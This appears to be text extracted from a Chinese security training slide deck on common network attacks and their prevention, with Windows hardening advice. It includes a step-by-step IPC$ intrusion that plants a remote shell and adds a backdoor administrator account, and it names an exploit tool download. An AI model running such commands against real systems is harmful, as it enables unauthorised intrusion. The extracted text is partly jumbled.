《绿盟常见网络攻击与防范.ppt》由会员分享,可在线阅读,更多相关《绿盟常见网络攻击与防范.ppt(77页珍藏版)》请在三一文库上搜索。
1、常见网络攻击与防范,提纲,常见的网络攻击方法 常用的安全防范措施,常见的网络攻击方法,1980,1985,1990,1995,2000,密码猜测,可自动复制的代码,密码破解,利用已知的漏洞,破坏审计系统,后门,会话劫持,擦除痕迹,嗅探,包欺骗,GUI远程控制,自动探测扫描,拒绝服务,www 攻击,工具,攻击者,入侵者水平,攻击手法,半开放隐蔽扫描,控制台入侵,检测网络管理,DDOS 攻击,2002,高,入侵技术的发展,采用 漏洞 扫描 工具,选择 会用 的 方式 入侵,获取 系统 一定 权限,提 升 为 最 高 权 限,安装 系统 后门,获取敏感信息 或者 其他攻击目的,入侵系统的常用步骤,端
2、口 判断,判断 系统,选择 最简 方式 入侵,分析 可能 有漏 洞的 服务,获取 系统 一定 权限,提 升 为 最 高 权 限,安装 多个 系统 后门,清除 入侵 脚印,攻击其 他系统,获取敏 感信息,作为其 他用途,较高明的入侵步骤,2001年中美黑客大战,事件背景和经过 4.1撞机事件为导火线 4月初,以PoizonB0x、pr0phet为代表的美国黑客组织对国内站点进行攻击,约300个左右的站点页面被修改 4月下旬,国内红(黑)客组织或个人,开始对美国网站进行小规模的攻击行动,4月26日有人发表了 “五一卫国网战”战前声明,宣布将在5月1日至8日,对美国网站进行大规模的攻击行动。 各方都
3、得到第三方支援 各大媒体纷纷报道,评论,中旬结束大战,PoizonB0x、pr0phet更改的网页,中经网数据有限公司,中国科学院心理研究所,国内某政府网站,国内某大型商业网站,国内黑客组织更改的网站页面,美国劳工部网站,美国某节点网站,美国某大型商业网站,美国某政府网站,这次事件中采用的常用攻击手法,红客联盟负责人在5月9日网上记者新闻发布会上对此次攻击事件的技术背景说明如下: “我们更多的是一种不满情绪的发泄,大家也可以看到被攻破的都是一些小站,大部分都是NT/Win2000系统, 这个行动在技术上是没有任何炫耀和炒作的价值的。” 主要采用当时流行的系统漏洞进行攻击,这次事件中被利用的典型
4、漏洞,用户名泄漏,缺省安装的系统用户名和密码 Unicode 编码可穿越firewall,执行黑客指令 ASP源代码泄露可远程连接的数据库用户名和密码 SQL server缺省安装 微软Windows 2000登录验证机制可被绕过 Bind 远程溢出,Lion蠕虫 SUN rpc.sadmind 远程溢出,sadmin/IIS蠕虫 Wu-Ftpd 格式字符串错误远程安全漏洞 拒绝服务 (syn-flood , ping ),这次事件中被利用的典型漏洞,用户名泄漏,缺省安装的系统用户名和密码,入侵者,利用黑客工具 扫描系统用户,获得用户名 和简单密码,这次事件中被利用的典型漏洞,Windows
5、2000登录验证机制可被绕过,常见的安全攻击方法,直接获取口令进入系统:网络监听,暴力破解 利用系统自身安全漏洞 特洛伊木马程序:伪装成工具程序或者游戏等诱使用户打开或下载,然后使用户在无意中激活,导致系统后门被安装 WWW欺骗:诱使用户访问纂改过的网页 电子邮件攻击:邮件炸弹、邮件欺骗 网络监听:获取明文传输的敏感信息 通过一个节点来攻击其他节点:攻击者控制一台主机后,经常通过IP欺骗或者主机信任关系来攻击其他节点以隐蔽其入侵路径和擦除攻击证据 拒绝服务攻击和分布式拒绝服务攻击(D.o.S 和D.D.o.S),IP地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。,获取信息,1
6、. 收集主机信息,Ping命令判断计算机是否开着,或者数据包发送到返回需要多少时间 Tracert/Tracerout命令跟踪从一台计算机到另外一台计算机所走的路径 Finger和Rusers命令收集用户信息 Host或者Nslookup命令,结合Whois和Finger命令获取主机、操作系统和用户等信息,应用的方法:,获取网络服务的端口作为入侵通道。,2. 端口扫瞄,1.TCP Connect() 2.TCP SYN 3.TCP FIN 4.IP段扫瞄 5.TCP反向Ident扫瞄 6.FTP代理扫瞄 7.UDP ICMP不到达扫瞄,7种扫瞄类型:,NSS(网络安全扫描器),可执行Sendm
7、ail、匿名FTP、NFS出口、TFTP、Host.equiv和Xhost等常规检查。 Strobe(超级优化TCP端口检测程序),可记录指定机器上的所有开放端口,快速识别指定机器上运行的服务,提示可以被攻击的服务。 SATAN(安全管理员的网络分析工具),SATAN用于扫描远程主机,发现漏洞,包括FTPD漏洞和可写的FTP目录,NFS漏洞、NIS漏洞、RSH漏洞、Sendmail和X服务器漏洞等。 Jakal扫描器,可启动而不完成TCP连接,因此可以扫描一个区域而不留下痕迹。 IdengTCPscan扫描器,可识别指定TCP端口的进程的UID。,扫瞄软件举例:,3.Sniffer扫瞄,原理:
8、 sniffer类的软件能把本地网卡设置成工作在“混杂” (promiscuous)方式,使该网卡能接收所有数据帧,从而获取别人的口令、金融帐号或其他敏感机密信息等。 方法与对策: 1、用交换机替换HUB,交换机是两两接通,比普通HUB安全。 2、使用检测的软件,如CPM Antisniff等,检测网络中是否有网卡工作在混杂状态(基本原理是发送本网中并不存在的MAC地址,看看是否有回应,如有回应,则说明有计算机网卡工作在混杂模式。)。,一次利用ipc$的入侵过程,1. C:net use x.x.x.xIPC$ “” /user:“admintitrators” 用流光扫到的用户名是admin
9、istrators,密码为“空”的IP地址 2. C:copy srv.exe x.x.x.xadmin$ 先复制srv.exe上去,在流光的Tools目录下 3. C:net time x.x.x.x 查查时间,发现x.x.x.x 的当前时间是 2003/3/19 上午 11:00,命令成功完成。 4. C:at x.x.x.x 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间推后) 5. C:net time x.x.x.x 再查查时间到了没有,如果x.x.x.x 的当前时间是 2003/3/19 上午 11:05,那就准备开始下面的命令。 6. C:
10、telnet x.x.x.x 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了,一次利用ipc$的入侵过程,7.C:copy ntlm.exe 127.0.0.1admin$ ntlm.exe也在流光的Tools目录中 8. C:WINNTsystem32ntlm 输入ntlm启动(这里的C:WINNTsystem32是在对方计算机上运行当出现“DONE”的
11、时候,就说明已经启动正常。然后使用“net start telnet”来开启Telnet服务) 9. Telnet x.x.x.x,接着输入用户名与密码就进入对方了 为了方便日后登陆,将guest激活并加到管理组 10. C:net user guest /active:yes 11. C:net user guest 1234 将Guest的密码改为1234 12. C:net localgroup administrators guest /add 将Guest变为Administrator,网络监听及防范技术,网络窃听是指通过截获他人网络上通信的数据流,并非法从中提取重要信息的一种方法
12、间接性 利用现有网络协议的一些漏洞来实现,不直接对受害主机系统的整体性进行任何操作或破坏 隐蔽性 网络窃听只对受害主机发出的数据流进行操作,不与主机交换信息,也不影响受害主机的正常通信,网络监听及防范技术 共享式局域网下,共享式局域网采用的是广播信道,每一台主机所发出的帧都会被全网内所有主机接收到 一般网卡具有以下四种工作模式:广播模式、多播模式、直接模式和混杂模式 网卡的缺省工作模式是广播模式和直接模式,即只接收发给自己的和广播的帧,网络监听及防范技术 共享式局域网下,使用MAC地址来确定数据包的流向 若等于自己的MAC地址或是广播MAC地址,则提交给上层处理程序,否则丢弃此数据 当网卡工作
13、于混杂模式的时候,它不做任何判断,直接将接收到的所有帧提交给上层处理程序 共享式网络下窃听就使用网卡的混杂模式,网络监听及防范技术 共享式局域网下,网络监听及防范技术 交换式局域网下,在数据链路层,数据帧的目的地址是以网卡的MAC地址来标识 ARP协议实现的配对寻址 ARP请求包是以广播的形式发出,正常情况下只有正确IP地址与的主机才会发出ARP响应包,告知查询主机自己的MAC地址。 局域网中每台主机都维护着一张ARP表,其中存放着地址对。,网络监听及防范技术 交换式局域网下,ARP改向的中间人窃听,A发往B:(MACb,MACa, PROTOCOL,DATA) B发往A:(MACa,MACb
14、, PROTOCOL,DATA),A发往B:(MACx,MACa, PROTOCOL,DATA) B发往A:(MACx,MACb, PROTOCOL,DATA),网络监听及防范技术 交换式局域网下,X分别向A和B发送ARP包,促使其修改ARP表 主机A的ARP表中B为 主机B的ARP表中A为 X成为主机A和主机B之间的“中间人”,网络监听及防范技术 网络窃听的被动防范,分割网段 细化网络会使得局域网中被窃听的可能性减小 使用静态ARP表 手工输入地址对 采用第三层交换方式 取消局域网对MAC地址、ARP协议的依赖,而采用基于IP地址的交换 加密 SSH、SSL、IPSec,网络监听及防范技术
15、网络窃听的主动防范,共享式局域网下的主动防范措施 伪造数据包 构造一个含有正确目标IP地址和一个不存在目标MAC地址各个操作系统处理方式不同,一个比较好的MAC地址是FF-FF-FF-FF-FF-FE 性能分析 向网络上发送大量包含无效MAC地址的数据包,窃听主机会因处理大量信息而导致性能下降,网络监听及防范技术 网络窃听的主动防范,交换式局域网下的主动防范措施 监听ARP数据包 监听通过交换机或者网关的所有ARP数据包,与预先建立的数据库相比较 定期探测数据包传送路径 使用路径探测程序如tracert、traceroute等对发出数据包所经过的路径进行检查,并与备份的合法路径作比较 使用SN
16、MP定期轮询ARP表,IP欺骗及防范技术 会话劫持,一般欺骗,会话劫持,IP欺骗及防范技术 会话劫持,会话劫持攻击的基本步骤 发现攻击目标 确认动态会话 猜测序列号 关键一步,技术难点 使被冒充主机下线 伪造FIN包,拒绝服务攻击 接管会话,IP欺骗及防范技术 会话劫持,猜测序列号 TCP区分正确数据包和错误数据包仅通过它们的SEQ/ACK序列号 选择恰当时间,在数据流中插入一个欺骗包,服务器将接受这个包,并且更新ACK序列号;然而客户主机仍继续使用老的SEQ序列号,而没有察觉我们的欺骗包,IP欺骗及防范技术防范技术,没有有效的办法可以从根本上防范会话劫持攻击 所有会话都加密保护实现困难 使用
17、安全协议(SSH、VPN)保护敏感会话 对网络数据流采取限制保护措施被动措施,电子邮件欺骗及防范技术 案例,2003年6月初,一些在中国工商银行进行过网上银行注册的客户,收到了一封来自网络管理员的电子邮件,宣称由于网络银行系统升级,要求客户重新填写用户名和密码。 这一举动随后被工行工作人员发现,经证实是不法分子冒用网站公开信箱,企图窃取客户的资料。 虽然没有造成多大的损失,但是这宗典型的电子邮件欺骗案例当时曾在国内安全界和金融界掀起了轩然大波,刺激人们针对信息安全问题展开了更加深切的讨论。,电子邮件欺骗及防范技术 原理,发送邮件使用SMTP(即简单邮件传输协议) SMTP协议的致命缺陷:过于信
18、任原则 SMTP假设的依据是:不怀疑邮件的使用者的身份和意图 伪装成为他人身份向受害者发送邮件 可以使用电子邮件客户端软件,也可以远程登录到25端口发送欺骗邮件,电子邮件欺骗及防范技术 防范,查看电子邮件头部信息 不仅指出了是否有人欺骗了电子邮件,而且指出了这个信息的来源 采用SMTP身份验证机制 使用与POP协议收取邮件时相同的用户名/密码 PGP邮件加密 以公钥密码学(Public Key Cryptology) 为基础的,Web欺骗及防范技术 概念,人们利用计算机系统完成具有安全需求的决策时往往是基于屏幕的显示 页面、URL 图标、图片 时间的先后顺序 攻击者创造一个完整的令人信服的We
19、b世界,但实际上它却是一个虚假的复制 攻击者控制这个虚假的Web站点,受害者浏览器和Web之间所有网络通信完全被攻击者截获,Web欺骗及防范技术 概念,Web欺骗及防范技术 原理,URL地址改写 http:/ http: / http:/ 攻击者改写Web页中的所有URL地址,使它们指向攻击者的Web服务器不是真正的Web服务器 :/,Web欺骗及防范技术 原理,欺骗过程 用户单击经过改写后的http:/ http:/ http:/ http:/ http:/ 原理,隐藏纰漏 由于JavaScript能够对连接状态栏写操作,而且可以将JavaScript操作与特定事件绑定在一起。 攻击者完全可
20、以将改写的URL状态恢复为改写前的状态。 JavaScript、ActiveX等技术使Web欺骗变得更为可信。,Web欺骗及防范技术 防范技术,检查页面的源代码 禁用JavaScrip、ActiveX等脚本语言 确保应用有效和能适当地跟踪用户 会话ID 使用尽可能长的随机数 教育是非常重要的,口令攻击,方法与对策: 1、限制同一用户的失败登录次数 2、限制口令最短长度,要求特权指令使用复杂的字母、数字组合。 3、定期更换口令,不要将口令存放到计算机文件中,1 口令暴力攻击: 生成口令字典,通过程序试探口令。,2 窃取口令文件后解密: 窃取口令文件(UNIX环境下的Passwd文件和Shadow
21、文件) ,通过软件解密。,CGI漏洞攻击,原理: 1.有些CGI程序只是简单地进行传递,不对内容进行过滤,攻击者就可能通过页面提交带有危险指令的脚本代码提交给机器去执行。 2.有些CGI能够过滤一些特征数据,但是有些攻击者故意制作一些混乱的字符串骗过检测(如使用退格字符)。 3. 有些管理员把CGI所在的目录设置为可写的,那么攻击者不仅可以修改替换页面,而且也可以通过新脚本为所欲为。 对策: 严格设置CGI脚本权限,采用安全的CGI。,漏洞攻击,FTP漏洞攻击,漏洞1:对使用的端口号没有任何限制,可以使用TCP提供给其他服务的任意端口,这就使攻击者利用FTP攻击其他服务。FTP服务器被当作攻击
22、武器使用了。 防范措施是设置服务器最好不要建立端口号在1024以下的连接,其次禁止FTP代理。 漏洞2:FTP标准允许无限次输入密码。防范措施是建议服务器限制尝试输入正确指令的次数,另外在一次登录失败后应暂停几秒来削减暴力攻击的有效性。 漏洞3:分配端口号时,通常按增序分配。防范措施是让系统改为使用随机分配端口号的方法。,缓冲区溢出攻击,在c语言中,下面程序将造成缓冲区溢出: char buffer10; strcpy(buffer,str); 或者Sprintf(buffer,”this is a test.”); 后果:普通的缓冲区溢出并不会产生安全问题,只有将溢出送到能够以root权限运
23、行命令的区域才会产生危害,最常见的方法是在溢出区域运行一个shell,再通过shell执行其他的命令。 对策:经常注意升级版本或下载补丁。 例如:IIS ISAPI .Printer的缓冲区溢出 攻击软件:http:/ http:/www.sunx.org/mysoft/iishack.zip 补丁:http:/ OOB攻击 耗尽连接攻击 利用放大原理 Smurf攻击 利用放大系统攻击 分布式拒绝服务攻击DDoS,1. OOB攻击(Out of Band) 原理: 攻击者是利用Windows下微软网络协定NetBIOS的一个例 外处理程序OOB(Out of Band)的漏洞。只要有人以OOB
24、的 方式,通过TCP/IP传递一个小小的包到某个IP地址的某个开放 的受端上(一般为139)。 对象:使没有防护或修订的win95/nt系统瞬间当机。 工具: Ssping、Teardrop(泪滴)、Trin00、Targe3,这些攻击都是利用系统的漏洞,因此补救的办法是升级或下载补丁,对策,2. 耗尽连接攻读 LAND攻击:向被攻击者发送一个个源地址和目标地址都被设 置成为被攻击者的地址的SYN包,导致被攻击者自己与自己建立 一个空连接,直到超时。 TCP/SYN攻击:攻击者向目标主机不断发送带有虚假源地址 的SYN包,目标主机发送ACK/SYN回应,因为源地址是虚假的, 所以不会收到ACK
25、回应,导致耗费大量资源等待ACK上,直止 系统资源耗尽。,这些攻击都是利用系统的漏洞,因此补救的办法是升级或下载补丁,对策,Smurf攻击,攻击者用广播的方式发送回复地址为受害者地址的ICMP请求数据包,每个收到这个数据包的主机都进行回应,大量的回复数据包发给受害者,导致受害主机崩溃。,Smurf攻击原理,利用放大系统攻击,某些类型的操作系统,在一定情况下,对一个请求所返回的信息比请求信息量大几十倍(如Macintosh),攻击者伪装成目标主机进行请求,导致大量数据流发向目标主机,加重了攻击效果。,DoS攻击技术DDoS技术,分布式拒绝服务攻击,攻击者在客户端通过telnet之类的常用连接软件
26、,向(master)主控端发送发送对目标主机的攻击请求命令。主控端(master)侦听接收攻击命令,并把攻击命令传到分布端,分布端是执行攻击的角色,收到命令立即发起flood攻击。,DDoS攻击原理,特洛伊木马,木马不同于病毒,但经常被视作病毒处理,随计算机自动启动并在某一端口进行侦听;木马的实质只是一个通过端口进行通信的网络客户/服务程序 特洛伊木马的种类 远程控制型 输出shell型 信息窃取型 其它类型,Netbus客户端程序,NetBus传输,NetBus使用TCP建立会话。缺省情况下用12345端口进行连接,12346端口进行数据传输 跟踪NetBus的活动比较困难。 可以通过检查1
27、2346端口数据来确定 许多类似的程序使用固定的端口,你可以扫描整个的网络监测可疑的活动。 简单方法 netstat -an,反弹型特洛伊木马,可穿透防火墙,控制局域网机器 服务器端主动发起连接,控制端监听80端口 自动上线通知 Email发送 读取主页空间的某个文件 网络神偷、灰鸽子、魔法控制 解决方法 安装防病毒软件和个人防火墙 检查可疑的进程和监听端口 提高安全警惕性,TCP/IP的每个层次都存在攻击,混合型、自动的攻击,Workstation Via Email,Workstation,Internet,混合型攻击:蠕虫,Workstation,攻击的发展趋势,攻击的发展趋势,漏洞趋势
28、 严重程度中等或较高的漏洞急剧增加,新漏洞被利用越来越容易(大约60%不需或很少需用代码) 混合型威胁趋势 将病毒、蠕虫、特洛伊木马和恶意代码的特性与服务器和 Internet 漏洞结合起来而发起、传播和扩散的攻击,例:红色代码和尼姆达等。 主动恶意代码趋势 制造方法:简单并工具化 技术特征:智能性、攻击性和多态性,采用加密、变换、插入等技术手段巧妙地伪装自身,躲避甚至攻击防御检测软件. 表现形式:多种多样,没有了固定的端口,没有了更多的连接,甚至发展到可以在网络的任何一层生根发芽,复制传播,难以检测。 受攻击未来领域 即时消息:MSN,Yahoo,ICQ,OICQ等 对等程序(P2P) 移动
29、设备,常见的安全防范措施,常用的安全防范措施,物理层 网络层 路由交换策略 VLAN划分 防火墙、隔离网闸 入侵检测 抗拒绝服务 传输加密 系统层 漏洞扫描 系统安全加固 SUS补丁安全管理 应用层 防病毒 安全功能增强 管理层 独立的管理队伍 统一的管理策略,常用的安全防护措施防火墙,入侵检测系统,Firewall,Servers,DMZ,Intranet,监控中心,router,攻击者,报警,报警,漏洞扫描系统,地方网管,监控中心,地方网管,地方网管,市场部,工程部,router,开发部,Servers,Firewall,漏洞扫描产品应用,系统安全加固,基本安全配置检测和优化 密码系统安全
30、检测和增强 系统后门检测 提供访问控制策略和工具 增强远程维护的安全性 文件系统完整性审计 增强的系统日志分析 系统升级与补丁安装,Windows系统安全加固,使用Windows update安装最新补丁; 更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值,保障帐号以及口令的安全; 卸载不需要的服务; 将暂时不需要开放的服务停止; 限制特定执行文件的权限; 设置主机审核策略; 调整事件日志的大小、覆盖策略; 禁止匿名用户连接; 删除主机管理共享; 限制Guest用户权限; 安装防病毒软件、及时更新病毒代码库; 安装个人防火墙。,Windows系统安
31、全加固,使用Windows update安装最新补丁; 更改密码长度最小值、密码最长存留期、密码最短存留期、帐号锁定计数器、帐户锁定时间、帐户锁定阀值,保障帐号以及口令的安全; 将默认Administrator用户和组改名,禁用Guests并将Guest改名; 开启安全审核策略; 卸载不需要的服务; 将暂时不需要开放的服务停止; 限制特定执行文件的权限; 调整事件日志的大小、覆盖策略; 禁止匿名用户连接; 删除主机管理共享; 安装防病毒软件、个人防火墙。,优化注册表增强安全性,限制空连接 HKEY_Local_MACHINESystemCurrentControlSetServicesLanM
32、anServerParameters 键值: RestrictNullSessAccess 类型: REG_DWORD 数值: 1 限制来宾和空登陆身份查看事件日志 HKEY_Local_MACHINESystemCurrentControlSetServicesEventLogApplication Security System 键值:RestrictGuestAccess 类型:REG_DWORD 数值:1,优化注册表增强安全性,限制服务器显示在网络列表中 HKEY_Local_MACHINESystemCurrentControlSetServicesLanManServerParam
33、eters 键值: hidden 类型: REG_DWORD 数值: 1 审核备份还原时间 HKEY_Local_MACHINESystemCurrentControlSetControlLsa 键值:FullPrivilegeAuditng 类型:REG_DWORD 数值:1,优化注册表增强安全性,不显示最后登陆名 HKEY_Local_MACHINESoftwareMicrosoftWindowsNTCurrentVersionWinlogon 键值: DontDisplayLastUserName 类型: REG_SZ 数值: 1 限制匿名用户列举用户和共享信息 HKEY_Local_MACHINESystemCurrentControlSetControlLsa 键值:RestrictAnonymous 类型:REG_DWORD 数值:1,优化注册表增强安全性,删除为管理员而设计的共享(C$,ADMIN$) 键值:AutoShareServer 类型:REG_DWORD 数值:1,